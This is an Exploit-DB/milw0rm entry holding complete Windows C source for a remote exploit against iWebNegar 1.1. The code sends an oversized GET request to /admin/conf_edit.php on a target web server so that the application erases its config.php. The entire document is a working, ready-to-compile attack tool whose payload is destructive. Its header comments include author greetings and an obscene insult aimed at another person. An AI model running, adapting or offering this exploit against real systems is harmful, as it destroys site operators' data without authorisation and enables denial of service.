https://www.exploit-db.com/exploits/738

漏洞细节尚未披露

/*
    iwebnegar 1.1 remote exploit
    c0ded by root / c0d3r " kaveh razavi ": [email protected]
        bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
        compile with Ms visual C++ (the php version written by the bug finder but still priv8)
        greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
        Jamie & Ben from exploitdev .
        Lamer : [email protected] ( who can fuck him ? )
  */
  /* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
      go to Die() functions which cause the erase of config.php
  */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

 

int main (int argc, char *argv[]){



 char req[] =
          "GET /admin/conf_edit.php?";
  unsigned int rc,addr,sock ;
  struct sockaddr_in tcp;
  struct hostent * hp;
  WSADATA wsaData;
char buffer[size];

   memset(buffer,'A',300);
   memcpy(buffer,req,25);

                if(argc < 2) {
                printf("nusage : iwebnegar hostn");
                printf("example : iwebnegar.exe 127.0.0.1n");
                exit(-1) ;
        }
  
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("WSAStartup failed !n");
   exit(-1);
  }
        hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("Unable to resolve %sn",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("socket() error...n");
   exit(-1);
  }
          if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
   tcp.sin_family = AF_INET;

  tcp.sin_port=htons(80);
  
  printf("n[+] attacking host %sn" , argv[1]) ;
  printf("[+] Building overflow stringn");
  Sleep(1000);
  printf("[+] packet size = %d byten" , sizeof(buffer));
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
        Sleep(1000) ;
         printf("[+] connectedn") ;
         
         send(sock , buffer , sizeof(buffer) , 0);
        
         printf("[+] see if the config.php erased ! nn") ;
             
        }
  else {
  printf("the 80 port is not open try another webserver portn");
 

  }
}

// milw0rm.com [2005-01-04]